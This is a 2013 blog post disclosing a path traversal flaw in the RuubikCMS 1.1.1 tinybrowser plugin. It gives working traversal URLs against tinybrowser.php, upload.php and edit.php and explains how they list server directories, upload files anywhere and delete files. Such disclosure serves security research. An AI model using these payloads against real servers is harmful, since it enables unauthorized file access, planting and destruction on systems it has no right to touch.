Thursday 6 June 2013

RuubikCMS 1.1.1 (tinybrowser.php, folder param) - Path Traversal Vulnerability


I found very simple Path traversal Vulnerability for RuubikCMS 1.1.1 , which can be exploited to list available files and folders from operating system,  I tested it on windows operating system.



Vulnerable Links :

http://127.0.0.1/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tinybrowser.php?
type=file&feid=filenameid

http://127.0.0.1/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=&feid=filenameid

http://127.0.0.1/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=file&folder=&feid=filenameid

http://127.0.0.1/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/folders.php?type=file&folder=&feid=filenameid


tinybrowser.php :

/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=../../../../&feid=filenameid

File and Directory names listing








  • By exploiting vulnerability in this page, we can list files and directories present on server, but observed that .php files are not being shown.

Folder created in Xampp directory










  • We can create folders by using above url, wherever we want!!!
upload.php

http://127.0.0.1/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/upload.php?type=file&feid=filenameid&folder=..%2F..%2F..%2F..%2F&badfiles=0&goodfiles=1&dupfiles=0

File uploaded in Xampp root directory



  • Using directory traversal exploit, we can upload files in specific directory, first we need to hit above URL which sets path internally to "c:\xampp" in my case, and now when you select file to upload and click on upload button, your file will be uploaded to "xampp" directory.
  • We could go ahead and upload PHP shell , but in this case when we try to do so, it throws permission error, but we can definitely upload ".html" wherever we want.


edit.php

http://127.0.0.1/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=file&folder=..%2F..%2F..%2F..%2F&feid=filenameid

Deleted Files from Xampp Directory (hack.txt)















  • Exploiting same vulnerability in edit.php page we can delete files by selecting directory using above exploit and then delete files listed.
  • Observed that files from important directories like "php" was not deleted using this procedure

Exploit has been published on :

http://www.exploit-db.com/exploits/25973/      [ EDB-ID: 25973 ] 
http://1337day.com/exploit/description/20859



Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)